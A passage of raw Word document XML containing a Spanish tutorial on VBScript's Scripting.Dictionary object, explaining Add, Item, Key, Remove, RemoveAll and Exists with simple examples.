          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>asignamos el objeto dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, para luego poder usar esa variable como una colección. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A diferencia de otros objetos este</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se debe de crear una vez para cada variable que queramos emplear </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de esta manera. Bien, ahora tenemos una colección en VarDic, vacia. Si queremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>asignarle valores utilizamos la función Add</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta se utiliza, poniendo el nombre de la variable seguido de un punto y la palabra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, un espacio, la clave entre comillas, una coma, y el valor que puede estar entre comillas, si se trata de un valor de cadena, o sin ellas si es un valor numérico. En la línea dos hemos asignado a la clave amigo el valor Juan, y en la tres al valor novia Maria. Si luego queremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ver el contenido de</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> VarDic cuando esta tiene la clave amigo, por ejemplo, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lo haremos así</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VarDic.</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amig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Utilizamos la</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> función Item </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para obtener el valor de la clave amigo, y por lo tanto en el MsgBox se </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>mostrara</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el valor Juan. La forma de usarlo es similar a la de la función Add: Utilizamos el nombre de la variable seguido de un punto y la palabra Item, un espacio y la clave entre comillas y paréntesis. Para que os aclaréis mas, podemos decir que todo el bloque VarDic.</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 xml:space="preserve">("amigo"), </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se puede </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>considerar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> como una variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y podéis utilizarlo como si se tratara como tal.</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Es decir, realmente solo he utilizado la variable VarDic, pero en cambio, por decirlo de alguna manera ahora tengo tres, dependiendo de la clave que ponga en VarDic.</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amigo"). Para que quede claro, podemos decir que los dos siguientes códigos son idénticos en cuanto a funcionalidad.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="7798" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4992"/>
        <w:gridCol w:w="2806"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499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VarDic.</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amigo")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2806" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>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Amigo = "Jua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Novia = "Jua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Padre = "Pep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VarAmigo</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De esta forma, VarDic.</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 xml:space="preserve">("amigo") y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VarAmigo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> son exactamente lo mismo y se pueden usar de la misma forma. </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La funcionalidad de este objeto viene cuando por ejemplo quiero poner los nombres, edades, direcciones y teléfonos de veinte personas. Con este objeto, en vez de crear ochenta variables, con crear cuatro (uno para nombres, uno para direcciones, uno para teléfonos, y el ultimo para edades) sobra. Además, puedes hacer que se correspondan, y así tienes menos trabaj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Nombre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Edad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Telefon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Direccion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ombre.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dad.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15</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Telefono.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96533000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Direccion.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Calle de Bartolo n13"</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Nombre.</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amigo</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>")&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>" Edad:"&amp;Edad.</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amig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Más o menos, esa seria la idea de uso del </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>objeto Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>conveniente conocer</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pues en programas más complejos es la única salida de estructurar variables que Visual Basic Script nos permite. Las siguientes funciones necesitan el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y se encargan de operar con los pares de valores del objet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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cambia la</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> clave del par que le indiquemos. Por ejemplo, en el siguiente ejemplo cambia la clave del valor Maria, de novia, que era lo primero que tenía asignado, a exnovia, que es el que le acabamos de poner. Si probamos de</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ver el valor de la clave novia nos dara error</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, ya que ahora su clave es exnov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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("novia") = "exnovi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La función se utiliza indicando la variable, luego un punto y la palabra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, luego la clave que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>queremos cambiar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> entre comillas y paréntesis, y por ultimo la nueva clave después del igual, entre comillas.</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gund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emove</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">elimina un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">valor, indicándole la clave de este. Por ejemplo, en el siguiente ejemplo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">borra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el valor de la clave amigo, de form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luego intentamos visualizarlo, no podremos porque lo hemos eliminad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Remove</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("amigo")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unción se utiliza indicando la variable, luego un punto y la palabra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Remove</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y luego la clave que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>queremos borrar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> entre comillas y paréntesis. Con esto es como si nunca hubiéramos escrito la segunda línea. Esta función tiene interés cuando se necesita </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cambiar el valor (no la clave) de un par</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, ya que lo que haremos será borrarla y crearla de nuevo con el nuevo valor.</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terc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emoveAll</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">vacía la variable del objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">dejándola sin nada. Es decir, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">borra todos los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">valores </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que tiene</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la variable. Pongamos un ejemplo de uso de esta funció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pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="308" w:line="259" w:lineRule="auto"/>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RemoveAll</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código de arriba equivaldría a uno en el que solo estuviera la primera línea. Es decir, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ha borrado los tres </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">valores </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que le hemos dado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esto sirve para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>reutilizar la variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o para cambiar todos los valores de esta. Su uso es sencillo, solo hay que indicar la variable a</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> borrar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y se usa como todas las de este tipo que hemos visto (no tiene ningún argumento).</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lastRenderedPageBreak/>
        <w:t>La cuar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Exists</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>comprueba si existe o no un valor asignado a una clave</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> concreta. Devuelve el valor True si existe y el valor False si no existe. Por ejemplo, si queremos saber si realmente ha escrito algo en un InputBox y no ha apretado cancelar podemos realizar lo siguiente, utilizando la sentencia If:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8654" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="73" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8654"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="2536"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865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Resp = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>InputBox(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"¿Que comida te gusta?","Comida","Introduce comida favorita")</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Resp&lt;&gt;"" Then VarDic.Add "respuesta", VarResp 'Esto es la sentencia If abreviada (solo 1 cas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Dic.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exists</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
